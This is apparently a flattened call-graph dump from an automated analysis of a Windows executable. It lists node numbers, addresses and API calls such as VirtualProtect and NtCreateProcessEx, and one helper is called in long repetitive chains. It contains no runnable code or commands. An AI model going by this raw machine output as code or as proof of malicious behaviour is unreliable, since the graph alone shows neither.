2576->2579 2586 7ff759bf4d2d 2576->2586 2995 7ff759bf157b 2579->2995 2580 7ff759bf145e 2 API calls 2580->2576 2584 7ff759bf4d0c memset 2584->2586 2585 7ff759bf4c9f wcslen 3027 7ff759bf15e4 2585->3027 2587 7ff759bf4d9d wcscpy wcscat 2586->2587 2591 7ff759bf4dcf 2587->2591 2589 7ff759bf4bf9 2589->2584 2589->2585 2593 7ff759bf2df0 11 API calls 2591->2593 2592 7ff759bf145e 2 API calls 2592->2584 2595 7ff759bf4ed7 2593->2595 2594 7ff759bf2df0 11 API calls 2596 7ff759bf4fec 2594->2596 2595->2594 2597 7ff759bf2df0 11 API calls 2596->2597 2598 7ff759bf50d6 2597->2598 2599 7ff759bf2df0 11 API calls 2598->2599 2602 7ff759bf51c0 2599->2602 2600 7ff759bf5301 wcslen 2601 7ff759bf157b 2 API calls 2600->2601 2603 7ff759bf538b 2601->2603 2602->2600 2604 7ff759bf5393 memset 2603->2604 2607 7ff759bf54a5 2603->2607 2605 7ff759bf53b4 2604->2605 2606 7ff759bf5404 wcslen 2605->2606 3030 7ff759bf15a8 2606->3030 2609 7ff759bf2df0 11 API calls 2607->2609 2616 7ff759bf5642 _wcsicmp 2607->2616 2615 7ff759bf5550 2609->2615 2611 7ff759bf5474 _wcsnicmp 2612 7ff759bf5499 2611->2612 2620 7ff759bf5c51 2611->2620 2613 7ff759bf145e 2 API calls 2612->2613 2613->2607 2614 7ff759bf2df0 11 API calls 2614->2616 2615->2614 2618 7ff759bf565d memset 2616->2618 2633 7ff759bf59e0 2616->2633 2617 7ff759bf5cae wcslen 2619 7ff759bf15a8 2 API calls 2617->2619 2622 7ff759bf5681 2618->2622 2621 7ff759bf5d0a 2619->2621 2620->2617 2624 7ff759bf145e 2 API calls 2621->2624 2623 7ff759bf56c6 wcscpy wcscat wcslen 2622->2623 2626 7ff759bf146d 2 API calls 2623->2626 2624->2607 2625 7ff759bf5a69 wcslen 2627 7ff759bf153f 2 API calls 2625->2627 2628 7ff759bf5793 2626->2628 2629 7ff759bf5af4 2627->2629 3041 7ff759bf1530 2628->3041 2631 7ff759bf145e 2 API calls 2629->2631 2632 7ff759bf5b05 2631->2632 2645 7ff759bf5b9c 2632->2645 3247 7ff759bf2f70 2632->3247 2633->2625 2635 7ff759bf6f06 2637 7ff759bf145e 2 API calls 2635->2637 2636 7ff759bf57d1 3068 7ff759bf14a9 2636->3068 2642 7ff759bf6f12 2637->2642 2641 7ff759bf5bf9 wcslen 2646 7ff759bf5c0f 2641->2646 2662 7ff759bf5c4c 2641->2662 2642->2509 2643 7ff759bf586d 2650 7ff759bf145e 2 API calls 2643->2650 2644 7ff759bf5b32 3251 7ff759bf38e0 2644->3251 2645->2641 2647 7ff759bf5c20 _wcsnicmp 2646->2647 2651 7ff759bf5c36 wcslen 2647->2651 2647->2662 2654 7ff759bf5861 2650->2654 2651->2647 2651->2662 3184 7ff759bf3350 memset 2654->3184 2655 7ff759bf5db9 memset wcscpy wcscat 2658 7ff759bf2f70 2 API calls 2655->2658 2656 7ff759bf5855 2659 7ff759bf145e 2 API calls 2656->2659 2657 7ff759bf14c7 2 API calls 2660 7ff759bf5b8e 2657->2660 2663 7ff759bf5e10 2658->2663 2659->2654 2660->2645 2666 7ff759bf145e 2 API calls 2660->2666 2662->2655 2665 7ff759bf3350 11 API calls 2663->2665 2668 7ff759bf5e28 2665->2668 2666->2645 2669 7ff759bf14c7 2 API calls 2668->2669 2670 7ff759bf5e56 memset 2669->2670 2673 7ff759bf5e77 2670->2673 2671 7ff759bf2df0 11 API calls 2681 7ff759bf5945 2671->2681 2672 7ff759bf58bc 2672->2671 2674 7ff759bf5ec7 wcslen 2673->2674 2675 7ff759bf5f17 wcscat memset 2674->2675 2676 7ff759bf5ed9 2674->2676 2683 7ff759bf5f51 2675->2683 2678 7ff759bf5ef0 _wcsnicmp 2676->2678 2678->2675 2680 7ff759bf5f02 wcslen 2678->2680 2679 7ff759bf2df0 11 API calls 2679->2554 2680->2675 2680->2678 2681->2679 2682 7ff759bf5fc1 wcscpy wcscat 2684 7ff759bf5ff3 2682->2684 2683->2682 2685 7ff759bf6e7a memcpy 2684->2685 2686 7ff759bf6130 2684->2686 2685->2686 2687 7ff759bf62f7 wcslen 2686->2687 2688 7ff759bf153f 2 API calls 2687->2688 2689 7ff759bf6382 2688->2689 2690 7ff759bf145e 2 API calls 2689->2690 2691 7ff759bf6393 2690->2691 2692 7ff759bf6432 2691->2692 2694 7ff759bf2f70 2 API calls 2691->2694 2693 7ff759bf145e 2 API calls 2692->2693 2693->2554 2695 7ff759bf63c0 2694->2695 2696 7ff759bf38e0 11 API calls 2695->2696 2697 7ff759bf63ec 2696->2697 2698 7ff759bf14c7 2 API calls 2697->2698 2699 7ff759bf6424 2698->2699 2699->2692 2700 7ff759bf145e 2 API calls 2699->2700 2700->2692 2703 7ff759bf1bc2 2701->2703 2704 7ff759bf1c45 VirtualQuery 2703->2704 2705 7ff759bf1cf4 2703->2705 2709 7ff759bf1c04 memcpy 2703->2709 2704->2705 2710 7ff759bf1c72 2704->2710 2706 7ff759bf1d23 GetLastError 2705->2706 2708 7ff759bf1d37 2706->2708 2707 7ff759bf1ca4 VirtualProtect 2707->2706 2707->2709 2709->2518 2710->2707 2710->2709 3274 7ff759bf1394 2711->3274 2713 7ff759bf154e 2714 7ff759bf1394 2 API calls 2713->2714 2715 7ff759bf155d 2714->2715 2716 7ff759bf1394 2 API calls 2715->2716 2717 7ff759bf156c 2716->2717 2718 7ff759bf1394 2 API calls 2717->2718 2719 7ff759bf157b 2718->2719 2720 7ff759bf1394 2 API calls 2719->2720 2721 7ff759bf158a 2720->2721 2722 7ff759bf1394 2 API calls 2721->2722 2723 7ff759bf1599 2722->2723 2724 7ff759bf1394 2 API calls 2723->2724 2725 7ff759bf15a8 2724->2725 2726 7ff759bf1394 2 API calls 2725->2726 2727 7ff759bf15b7 2726->2727 2728 7ff759bf1394 2 API calls 2727->2728 2729 7ff759bf15c6 2728->2729 2730 7ff759bf1394 2 API calls 2729->2730 2731 7ff759bf15d5 2730->2731 2732 7ff759bf15e4 2731->2732 2733 7ff759bf1394 2 API calls 2731->2733 2734 7ff759bf1394 2 API calls 2732->2734 2733->2732 2735 7ff759bf15f3 2734->2735 2735->2554 2736 7ff759bf1503 2735->2736 2737 7ff759bf1394 2 API calls 2736->2737 2738 7ff759bf150d 2737->2738 2739 7ff759bf1394 2 API calls 2738->2739 2740 7ff759bf1512 2739->2740 2741 7ff759bf1394 2 API calls 2740->2741 2742 7ff759bf1521 2741->2742 2743 7ff759bf1394 2 API calls 2742->2743 2744 7ff759bf1530 2743->2744 2745 7ff759bf1394 2 API calls 2744->2745 2746 7ff759bf153f 2745->2746 2747 7ff759bf1394 2 API calls 2746->2747 2748 7ff759bf154e 2747->2748 2749 7ff759bf1394 2 API calls 2748->2749 2750 7ff759bf155d 2749->2750 2751 7ff759bf1394 2 API calls 2750->2751 2752 7ff759bf156c 2751->2752 2753 7ff759bf1394 2 API calls 2752->2753 2754 7ff759bf157b 2753->2754 2755 7ff759bf1394 2 API calls 2754->2755 2756 7ff759bf158a 2755->2756 2757 7ff759bf1394 2 API calls 2756->2757 2758 7ff759bf1599 2757->2758 2759 7ff759bf1394 2 API calls 2758->2759 2760 7ff759bf15a8 2759->2760 2761 7ff759bf1394 2 API calls 2760->2761 2762 7ff759bf15b7 2761->2762 2763 7ff759bf1394 2 API calls 2762->2763 2764 7ff759bf15c6 2763->2764 2765 7ff759bf1394 2 API calls 2764->2765 2766 7ff759bf15d5 2765->2766 2767 7ff759bf15e4 2766->2767 2768 7ff759bf1394 2 API calls 2766->2768 2769 7ff759bf1394 2 API calls 2767->2769 2768->2767 2770 7ff759bf15f3 2769->2770 2770->2533 2771 7ff759bf156c 2770->2771 2772 7ff759bf1394 2 API calls 2771->2772 2773 7ff759bf157b 2772->2773 2774 7ff759bf1394 2 API calls 2773->2774 2775 7ff759bf158a 2774->2775 2776 7ff759bf1394 2 API calls 2775->2776 2777 7ff759bf1599 2776->2777 2778 7ff759bf1394 2 API calls 2777->2778 2779 7ff759bf15a8 2778->2779 2780 7ff759bf1394 2 API calls 2779->2780 2781 7ff759bf15b7 2780->2781 2782 7ff759bf1394 2 API calls 2781->2782 2783 7ff759bf15c6 2782->2783 2784 7ff759bf1394 2 API calls 2783->2784 2785 7ff759bf15d5 2784->2785 2786 7ff759bf15e4 2785->2786 2787 7ff759bf1394 2 API calls 2785->2787 2788 7ff759bf1394 2 API calls 2786->2788 2787->2786 2789 7ff759bf15f3 2788->2789 2789->2533 2790 7ff759bf145e 2789->2790 2791 7ff759bf1394 2 API calls 2790->2791 2792 7ff759bf146d 2791->2792 2793 7ff759bf1394 2 API calls 2792->2793 2794 7ff759bf147c 2793->2794 2795 7ff759bf1394 2 API calls 2794->2795 2796 7ff759bf148b 2795->2796 2797 7ff759bf1394 2 API calls 2796->2797 2798 7ff759bf149a 2797->2798 2799 7ff759bf1394 2 API calls 2798->2799 2800 7ff759bf14a9 2799->2800 2801 7ff759bf1394 2 API calls 2800->2801 2802 7ff759bf14b8 2801->2802 2803 7ff759bf1394 2 API calls 2802->2803 2804 7ff759bf14c7 2803->2804 2805 7ff759bf1394 2 API calls 2804->2805 2806 7ff759bf14d6 2805->2806 2807 7ff759bf14e5 2806->2807 2808 7ff759bf1394 2 API calls 2806->2808 2809 7ff759bf1394 2 API calls 2807->2809 2808->2807 2810 7ff759bf14ef 2809->2810 2811 7ff759bf14f4 2810->2811 2812 7ff759bf1394 2 API calls 2810->2812 2813 7ff759bf1394 2 API calls 2811->2813 2812->2811 2814 7ff759bf14fe 2813->2814 2815 7ff759bf1503 2814->2815 2816 7ff759bf1394 2 API calls 2814->2816 2817 7ff759bf1394 2 API calls 2815->2817 2816->2815 2818 7ff759bf150d 2817->2818 2819 7ff759bf1394 2 API calls 2818->2819 2820 7ff759bf1512 2819->2820 2821 7ff759bf1394 2 API calls 2820->2821 2822 7ff759bf1521 2821->2822 2823 7ff759bf1394 2 API calls 2822->2823 2824 7ff759bf1530 2823->2824 2825 7ff759bf1394 2 API calls 2824->2825 2826 7ff759bf153f 2825->2826 2827 7ff759bf1394 2 API calls 2826->2827 2828 7ff759bf154e 2827->2828 2829 7ff759bf1394 2 API calls 2828->2829 2830 7ff759bf155d 2829->2830 2831 7ff759bf1394 2 API calls 2830->2831 2832 7ff759bf156c 2831->2832 2833 7ff759bf1394 2 API calls 2832->2833 2834 7ff759bf157b 2833->2834 2835 7ff759bf1394 2 API calls 2834->2835 2836 7ff759bf158a 2835->2836 2837 7ff759bf1394 2 API calls 2836->2837 2838 7ff759bf1599 2837->2838 2839 7ff759bf1394 2 API calls 2838->2839 2840 7ff759bf15a8 2839->2840 2841 7ff759bf1394 2 API calls 2840->2841 2842 7ff759bf15b7 2841->2842 2843 7ff759bf1394 2 API calls 2842->2843 2844 7ff759bf15c6 2843->2844 2845 7ff759bf1394 2 API calls 2844->2845 2846 7ff759bf15d5 2845->2846 2847 7ff759bf15e4 2846->2847 2848 7ff759bf1394 2 API calls 2846->2848 2849 7ff759bf1394 2 API calls 2847->2849 2848->2847 2850 7ff759bf15f3 2849->2850 2850->2533 3278 7ff759bf2660 2851->3278 2853 7ff759bf2e00 memset 2861 7ff759bf2e3c 2853->2861 2856 7ff759bf145e 2 API calls 2857 7ff759bf2f35 2856->2857 2858 7ff759bf2f53 2857->2858 3313 7ff759bf1512 2857->3313 2860 7ff759bf145e 2 API calls 2858->2860 2862 7ff759bf2f5d 2860->2862 3280 7ff759bf2690 2861->3280 2862->2554 2864 7ff759bf1394 2 API calls 2863->2864 2865 7ff759bf147c 2864->2865 2866 7ff759bf1394 2 API calls 2865->2866 2867 7ff759bf148b 2866->2867 2868 7ff759bf1394 2 API calls 2867->2868 2869 7ff759bf149a 2868->2869 2870 7ff759bf1394 2 API calls 2869->2870 2871 7ff759bf14a9 2870->2871 2872 7ff759bf1394 2 API calls 2871->2872 2873 7ff759bf14b8 2872->2873 2874 7ff759bf1394 2 API calls 2873->2874 2875 7ff759bf14c7 2874->2875 2876 7ff759bf1394 2 API calls 2875->2876 2877 7ff759bf14d6 2876->2877 2878 7ff759bf14e5 2877->2878 2879 7ff759bf1394 2 API calls 2877->2879 2880 7ff759bf1394 2 API calls 2878->2880 2879->2878 2881 7ff759bf14ef 2880->2881 2882 7ff759bf14f4 2881->2882 2883 7ff759bf1394 2 API calls 2881->2883 2884 7ff759bf1394 2 API calls 2882->2884 2883->2882 2885 7ff759bf14fe 2884->2885 2886 7ff759bf1503 2885->2886 2887 7ff759bf1394 2 API calls 2885->2887 2888 7ff759bf1394 2 API calls 2886->2888 2887->2886 2889 7ff759bf150d 2888->2889 2890 7ff759bf1394 2 API calls 2889->2890 2891 7ff759bf1512 2890->2891 2892 7ff759bf1394 2 API calls 2891->2892 2893 7ff759bf1521 2892->2893 2894 7ff759bf1394 2 API calls 2893->2894 2895 7ff759bf1530 2894->2895 2896 7ff759bf1394 2 API calls 2895->2896 2897 7ff759bf153f 2896->2897 2898 7ff759bf1394 2 API calls 2897->2898 2899 7ff759bf154e 2898->2899 2900 7ff759bf1394 2 API calls 2899->2900 2901 7ff759bf155d 2900->2901 2902 7ff759bf1394 2 API calls 2901->2902 2903 7ff759bf156c 2902->2903 2904 7ff759bf1394 2 API calls 2903->2904 2905 7ff759bf157b 2904->2905 2906 7ff759bf1394 2 API calls 2905->2906 2907 7ff759bf158a 2906->2907 2908 7ff759bf1394 2 API calls 2907->2908 2909 7ff759bf1599 2908->2909 2910 7ff759bf1394 2 API calls 2909->2910 2911 7ff759bf15a8 2910->2911 2912 7ff759bf1394 2 API calls 2911->2912 2913 7ff759bf15b7 2912->2913 2914 7ff759bf1394 2 API calls 2913->2914 2915 7ff759bf15c6 2914->2915 2916 7ff759bf1394 2 API calls 2915->2916 2917 7ff759bf15d5 2916->2917 2918 7ff759bf15e4 2917->2918 2919 7ff759bf1394 2 API calls 2917->2919 2920 7ff759bf1394 2 API calls 2918->2920 2919->2918 2921 7ff759bf15f3 2920->2921 2921->2576 2922 7ff759bf1404 2921->2922 2923 7ff759bf1394 2 API calls 2922->2923 2924 7ff759bf1413 2923->2924 2925 7ff759bf1394 2 API calls 2924->2925 2926 7ff759bf1422 2925->2926 2927 7ff759bf1394 2 API calls 2926->2927 2928 7ff759bf1431 2927->2928 2929 7ff759bf1394 2 API calls 2928->2929 2930 7ff759bf1440 2929->2930 2931 7ff759bf1394 2 API calls 2930->2931 2932 7ff759bf144f 2931->2932 2933 7ff759bf1394 2 API calls 2932->2933 2934 7ff759bf145e 2933->2934 2935 7ff759bf1394 2 API calls 2934->2935 2936 7ff759bf146d 2935->2936 2937 7ff759bf1394 2 API calls 2936->2937 2938 7ff759bf147c 2937->2938 2939 7ff759bf1394 2 API calls 2938->2939 2940 7ff759bf148b 2939->2940 2941 7ff759bf1394 2 API calls 2940->2941 2942 7ff759bf149a 2941->2942 2943 7ff759bf1394 2 API calls 2942->2943 2944 7ff759bf14a9 2943->2944 2945 7ff759bf1394 2 API calls 2944->2945 2946 7ff759bf14b8 2945->2946 2947 7ff759bf1394 2 API calls 2946->2947 2948 7ff759bf14c7 2947->2948 2949 7ff759bf1394 2 API calls 2948->2949 2950 7ff759bf14d6 2949->2950 2951 7ff759bf14e5 2950->2951 2952 7ff759bf1394 2 API calls 2950->2952 2953 7ff759bf1394 2 API calls 2951->2953 2952->2951 2954 7ff759bf14ef 2953->2954 2955 7ff759bf14f4 2954->2955 2956 7ff759bf1394 2 API calls 2954->2956 2957 7ff759bf1394 2 API calls 2955->2957 2956->2955 2958 7ff759bf14fe 2957->2958 2959 7ff759bf1503 2958->2959 2960 7ff759bf1394 2 API calls 2958->2960 2961 7ff759bf1394 2 API calls 2959->2961 2960->2959 2962 7ff759bf150d 2961->2962 2963 7ff759bf1394 2 API calls 2962->2963 2964 7ff759bf1512 2963->2964 2965 7ff759bf1394 2 API calls 2964->2965 2966 7ff759bf1521 2965->2966 2967 7ff759bf1394 2 API calls 2966->2967 2968 7ff759bf1530 2967->2968 2969 7ff759bf1394 2 API calls 2968->2969 2970 7ff759bf153f 2969->2970 2971 7ff759bf1394 2 API calls 2970->2971 2972 7ff759bf154e 2971->2972 2973 7ff759bf1394 2 API calls 2972->2973 2974 7ff759bf155d 2973->2974 2975 7ff759bf1394 2 API calls 2974->2975 2976 7ff759bf156c 2975->2976 2977 7ff759bf1394 2 API calls 2976->2977 2978 7ff759bf157b 2977->2978 2979 7ff759bf1394 2 API calls 2978->2979 2980 7ff759bf158a 2979->2980 2981 7ff759bf1394 2 API calls 2980->2981 2982 7ff759bf1599 2981->2982 2983 7ff759bf1394 2 API calls 2982->2983 2984 7ff759bf15a8 2983->2984 2985 7ff759bf1394 2 API calls 2984->2985 2986 7ff759bf15b7 2985->2986 2987 7ff759bf1394 2 API calls 2986->2987 2988 7ff759bf15c6 2987->2988 2989 7ff759bf1394 2 API calls 2988->2989 2990 7ff759bf15d5 2989->2990 2991 7ff759bf15e4 2990->2991 2992 7ff759bf1394 2 API calls 2990->2992 2993 7ff759bf1394 2 API calls 2991->2993 2992->2991 2994 7ff759bf15f3 2993->2994 2994->2580 2996 7ff759bf1394 2 API calls 2995->2996 2997 7ff759bf158a 2996->2997 2998 7ff759bf1394 2 API calls 2997->2998 2999 7ff759bf1599 2998->2999 3000 7ff759bf1394 2 API calls 2999->3000 3001 7ff759bf15a8 3000->3001 3002 7ff759bf1394 2 API calls 3001->3002 3003 7ff759bf15b7 3002->3003 3004 7ff759bf1394 2 API calls 3003->3004 3005 7ff759bf15c6 3004->3005 3006 7ff759bf1394 2 API calls 3005->3006 3007 7ff759bf15d5 3006->3007 3008 7ff759bf15e4 3007->3008 3009 7ff759bf1394 2 API calls 3007->3009 3010 7ff759bf1394 2 API calls 3008->3010 3009->3008 3011 7ff759bf15f3 3010->3011 3011->2589 3012 7ff759bf158a 3011->3012 3013 7ff759bf1394 2 API calls 3012->3013 3014 7ff759bf1599 3013->3014 3015 7ff759bf1394 2 API calls 3014->3015 3016 7ff759bf15a8 3015->3016 3017 7ff759bf1394 2 API calls 3016->3017 3018 7ff759bf15b7 3017->3018 3019 7ff759bf1394 2 API calls 3018->3019 3020 7ff759bf15c6 3019->3020 3021 7ff759bf1394 2 API calls 3020->3021 3022 7ff759bf15d5 3021->3022 3023 7ff759bf15e4 3022->3023 3024 7ff759bf1394 2 API calls 3022->3024 3025 7ff759bf1394 2 API calls 3023->3025 3024->3023 3026 7ff759bf15f3 3025->3026 3026->2589 3028 7ff759bf1394 2 API calls 3027->3028 3029 7ff759bf15f3 3028->3029 3029->2592 3031 7ff759bf1394 2 API calls 3030->3031 3032 7ff759bf15b7 3031->3032 3033 7ff759bf1394 2 API calls 3032->3033 3034 7ff759bf15c6 3033->3034 3035 7ff759bf1394 2 API calls 3034->3035 3036 7ff759bf15d5 3035->3036 3037 7ff759bf15e4 3036->3037 3038 7ff759bf1394 2 API calls 3036->3038 3039 7ff759bf1394 2 API calls 3037->3039 3038->3037 3040 7ff759bf15f3 3039->3040 3040->2611 3040->2612 3042 7ff759bf1394 2 API calls 3041->3042 3043 7ff759bf153f 3042->3043 3044 7ff759bf1394 2 API calls 3043->3044 3045 7ff759bf154e 3044->3045 3046 7ff759bf1394 2 API calls 3045->3046 3047 7ff759bf155d 3046->3047 3048 7ff759bf1394 2 API calls 3047->3048 3049 7ff759bf156c 3048->3049 3050 7ff759bf1394 2 API calls 3049->3050 3051 7ff759bf157b 3050->3051 3052 7ff759bf1394 2 API calls 3051->3052 3053 7ff759bf158a 3052->3053 3054 7ff759bf1394 2 API calls 3053->3054 3055 7ff759bf1599 3054->3055 3056 7ff759bf1394 2 API calls 3055->3056 3057 7ff759bf15a8 3056->3057 3058 7ff759bf1394 2 API calls 3057->3058 3059 7ff759bf15b7 3058->3059 3060 7ff759bf1394 2 API calls 3059->3060 3061 7ff759bf15c6 3060->3061 3062 7ff759bf1394 2 API calls 3061->3062 3063 7ff759bf15d5 3062->3063 3064 7ff759bf15e4 3063->3064 3065 7ff759bf1394 2 API calls 3063->3065 3066 7ff759bf1394 2 API calls 3064->3066 3065->3064 3067 7ff759bf15f3 3066->3067 3067->2635 3067->2636 3069 7ff759bf1394 2 API calls 3068->3069 3070 7ff759bf14b8 3069->3070 3071 7ff759bf1394 2 API calls 3070->3071 3072 7ff759bf14c7 3071->3072 3073 7ff759bf1394 2 API calls 3072->3073 3074 7ff759bf14d6 3073->3074 3075 7ff759bf14e5 3074->3075 3076 7ff759bf1394 2 API calls 3074->3076 3077 7ff759bf1394 2 API calls 3075->3077 3076->3075 3078 7ff759bf14ef 3077->3078 3079 7ff759bf14f4 3078->3079 3080 7ff759bf1394 2 API calls 3078->3080 3081 7ff759bf1394 2 API calls 3079->3081 3080->3079 3082 7ff759bf14fe 3081->3082 3083 7ff759bf1503 3082->3083 3084 7ff759bf1394 2 API calls 3082->3084 3085 7ff759bf1394 2 API calls 3083->3085 3084->3083 3086 7ff759bf150d 3085->3086 3087 7ff759bf1394 2 API calls 3086->3087 3088 7ff759bf1512 3087->3088 3089 7ff759bf1394 2 API calls 3088->3089 3090 7ff759bf1521 3089->3090 3091 7ff759bf1394 2 API calls 3090->3091 3092 7ff759bf1530 3091->3092 3093 7ff759bf1394 2 API calls 3092->3093 3094 7ff759bf153f 3093->3094 3095 7ff759bf1394 2 API calls 3094->3095 3096 7ff759bf154e 3095->3096 3097 7ff759bf1394 2 API calls 3096->3097 3098 7ff759bf155d 3097->3098 3099 7ff759bf1394 2 API calls 3098->3099 3100 7ff759bf156c 3099->3100 3101 7ff759bf1394 2 API calls 3100->3101 3102 7ff759bf157b 3101->3102 3103 7ff759bf1394 2 API calls 3102->3103 3104 7ff759bf158a 3103->3104 3105 7ff759bf1394 2 API calls 3104->3105 3106 7ff759bf1599 3105->3106 3107 7ff759bf1394 2 API calls 3106->3107 3108 7ff759bf15a8 3107->3108 3109 7ff759bf1394 2 API calls 3108->3109 3110 7ff759bf15b7 3109->3110 3111 7ff759bf1394 2 API calls 3110->3111 3112 7ff759bf15c6 3111->3112 3113 7ff759bf1394 2 API calls 3112->3113 3114 7ff759bf15d5 3113->3114 3115 7ff759bf15e4 3114->3115 3116 7ff759bf1394 2 API calls 3114->3116 3117 7ff759bf1394 2 API calls 3115->3117 3116->3115 3118 7ff759bf15f3 3117->3118 3118->2643 3119 7ff759bf1440 3118->3119 3120 7ff759bf1394 2 API calls 3119->3120 3121 7ff759bf144f 3120->3121 3122 7ff759bf1394 2 API calls 3121->3122 3123 7ff759bf145e 3122->3123 3124 7ff759bf1394 2 API calls 3123->3124 3125 7ff759bf146d 3124->3125 3126 7ff759bf1394 2 API calls 3125->3126 3127 7ff759bf147c 3126->3127 3128 7ff759bf1394 2 API calls 3127->3128 3129 7ff759bf148b 3128->3129 3130 7ff759bf1394 2 API calls 3129->3130 3131 7ff759bf149a 3130->3131 3132 7ff759bf1394 2 API calls 3131->3132 3133 7ff759bf14a9 3132->3133 3134 7ff759bf1394 2 API calls 3133->3134 3135 7ff759bf14b8 3134->3135 3136 7ff759bf1394 2 API calls 3135->3136 3137 7ff759bf14c7 3136->3137 3138 7ff759bf1394 2 API calls 3137->3138 3139 7ff759bf14d6 3138->3139 3140 7ff759bf14e5 3139->3140 3141 7ff759bf1394 2 API calls 3139->3141 3142 7ff759bf1394 2 API calls 3140->3142 3141->3140 3143 7ff759bf14ef 3142->3143 3144 7ff759bf14f4 3143->3144 3145 7ff759bf1394 2 API calls 3143->3145 3146 7ff759bf1394 2 API calls 3144->3146 3145->3144 3147 7ff759bf14fe 3146->3147 3148 7ff759bf1503 3147->3148 3149 7ff759bf1394 2 API calls 3147->3149 3150 7ff759bf1394 2 API calls 3148->3150 3149->3148 3151 7ff759bf150d 3150->3151 3152 7ff759bf1394 2 API calls 3151->3152 3153 7ff759bf1512 3152->3153 3154 7ff759bf1394 2 API calls 3153->3154 3155 7ff759bf1521 3154->3155 3156 7ff759bf1394 2 API calls 3155->3156 3157 7ff759bf1530 3156->3157 3158 7ff759bf1394 2 API calls 3157->3158 3159 7ff759bf153f 3158->3159 3160 7ff759bf1394 2 API calls 3159->3160 3161 7ff759bf154e 3160->3161 3162 7ff759bf1394 2 API calls 3161->3162 3163 7ff759bf155d 3162->3163 3164 7ff759bf1394 2 API calls 3163->3164 3165 7ff759bf156c 3164->3165 3166 7ff759bf1394 2 API calls 3165->3166 3167 7ff759bf157b 3166->3167 3168 7ff759bf1394 2 API calls 3167->3168 3169 7ff759bf158a 3168->3169 3170 7ff759bf1394 2 API calls 3169->3170 3171 7ff759bf1599 3170->3171 3172 7ff759bf1394 2 API calls 3171->3172 3173 7ff759bf15a8 3172->3173 3174 7ff759bf1394 2 API calls 3173->3174 3175 7ff759bf15b7 3174->3175 3176 7ff759bf1394 2 API calls 3175->3176 3177 7ff759bf15c6 3176->3177 3178 7ff759bf1394 2 API calls 3177->3178 3179 7ff759bf15d5 3178->3179 3180 7ff759bf15e4 3179->3180 3181 7ff759bf1394 2 API calls 3179->3181 3182 7ff759bf1394 2 API calls 3180->3182 3181->3180 3183 7ff759bf15f3 3182->3183 3183->2643 3183->2656 3185 7ff759bf35c1 memset 3184->3185 3195 7ff759bf33c3 3184->3195 3186 7ff759bf35e6 3185->3186 3188 7ff759bf362b wcscpy wcscat wcslen 3186->3188 3187 7ff759bf343a memset 3187->3195 3189 7ff759bf1422 2 API calls 3188->3189 3191 7ff759bf3728 3189->3191 3190 7ff759bf3493 wcscpy wcscat wcslen 3447 7ff759bf1422 3190->3447 3193 7ff759bf3767 3191->3193 3516 7ff759bf1431 3191->3516 3200 7ff759bf14c7 3193->3200 3195->3185 3195->3187 3195->3190 3197 7ff759bf145e 2 API calls 3195->3197 3199 7ff759bf3579 3195->3199 3197->3195 3198 7ff759bf145e 2 API calls 3198->3193 3199->3185 3201 7ff759bf1394 2 API calls 3200->3201 3202 7ff759bf14d6 3201->3202 3203 7ff759bf14e5 3202->3203 3204 7ff759bf1394 2 API calls 3202->3204 3205 7ff759bf1394 2 API calls 3203->3205 3204->3203 3206 7ff759bf14ef 3205->3206 3207 7ff759bf14f4 3206->3207 3208 7ff759bf1394 2 API calls 3206->3208 3209 7ff759bf1394 2 API calls 3207->3209 3208->3207 3210 7ff759bf14fe 3209->3210 3211 7ff759bf1503 3210->3211 3212 7ff759bf1394 2 API calls 3210->3212 3213 7ff759bf1394 2 API calls 3211->3213 3212->3211 3214 7ff759bf150d 3213->3214 3215 7ff759bf1394 2 API calls 3214->3215 3216 7ff759bf1512 3215->3216 3217 7ff759bf1394 2 API calls 3216->3217 3218 7ff759bf1521 3217->3218 3219 7ff759bf1394 2 API calls 3218->3219 3220 7ff759bf1530 3219->3220 3221 7ff759bf1394 2 API calls 3220->3221 3222 7ff759bf153f 3221->3222 3223 7ff759bf1394 2 API calls 3222->3223 3224 7ff759bf154e 3223->3224 3225 7ff759bf1394 2 API calls 3224->3225 3226 7ff759bf155d 3225->3226 3227 7ff759bf1394 2 API calls 3226->3227 3228 7ff759bf156c 3227->3228 3229 7ff759bf1394 2 API calls 3228->3229 3230 7ff759bf157b 3229->3230 3231 7ff759bf1394 2 API calls 3230->3231 3232 7ff759bf158a 3231->3232 3233 7ff759bf1394 2 API calls 3232->3233 3234 7ff759bf1599 3233->3234 3235 7ff759bf1394 2 API calls 3234->3235 3236 7ff759bf15a8 3235->3236 3237 7ff759bf1394 2 API calls 3236->3237 3238 7ff759bf15b7 3237->3238 3239 7ff759bf1394 2 API calls 3238->3239 3240 7ff759bf15c6 3239->3240 3241 7ff759bf1394 2 API calls 3240->3241 3242 7ff759bf15d5 3241->3242 3243 7ff759bf15e4 3242->3243 3244 7ff759bf1394 2 API calls 3242->3244 3245 7ff759bf1394 2 API calls 3243->3245 3244->3243 3246 7ff759bf15f3 3245->3246 3246->2672 3248 7ff759bf2f88 3247->3248 3249 7ff759bf14a9 2 API calls 3248->3249 3250 7ff759bf2fd0 3249->3250 3250->2644 3252 7ff759bf2690 10 API calls 3251->3252 3253 7ff759bf391e 3252->3253 3254 7ff759bf3b21 3253->3254 3255 7ff759bf14a9 2 API calls 3253->3255 3254->2657 3256 7ff759bf3967 3255->3256 3257 7ff759bf3b28 3256->3257 3583 7ff759bf14b8 3256->3583 3802 7ff759bf15c6 3257->3802 3260 7ff759bf398f 3261 7ff759bf3a87 memset 3260->3261 3263 7ff759bf14b8 2 API calls 3260->3263 3632 7ff759bf15d5 3260->3632 3637 7ff759bf148b 3261->3637 3263->3260 3268 7ff759bf14b8 2 API calls 3269 7ff759bf3b07 3268->3269 3269->3257 3270 7ff759bf3b0b 3269->3270 3745 7ff759bf147c 3270->3745 3273 7ff759bf145e 2 API calls 3273->3254 3275 7ff759bf83f0 malloc 3274->3275 3276 7ff759bf13b8 3275->3276 3277 7ff759bf13c6 NtCreateProcessEx 3276->3277 3277->2713 3279 7ff759bf266f 3278->3279 3279->2853 3279->3279 3344 7ff759bf155d 3280->3344 3282 7ff759bf27f4 3283 7ff759bf14c7 2 API calls 3282->3283 3284 7ff759bf2816 3283->3284 3288 7ff759bf1503 2 API calls 3284->3288 3285 7ff759bf2785 wcsncmp 3365 7ff759bf14e5 3285->3365 3289 7ff759bf283d 3288->3289 3291 7ff759bf2847 memset 3289->3291 3290 7ff759bf2d27 3292 7ff759bf2877 3291->3292 3293 7ff759bf28bc wcscpy wcscat wcslen 3292->3293 3294 7ff759bf28ee wcslen 3293->3294 3295 7ff759bf291a 3293->3295 3294->3295 3296 7ff759bf2967 wcslen 3295->3296 3298 7ff759bf2985 3295->3298 3296->3298 3297 7ff759bf29d9 wcslen 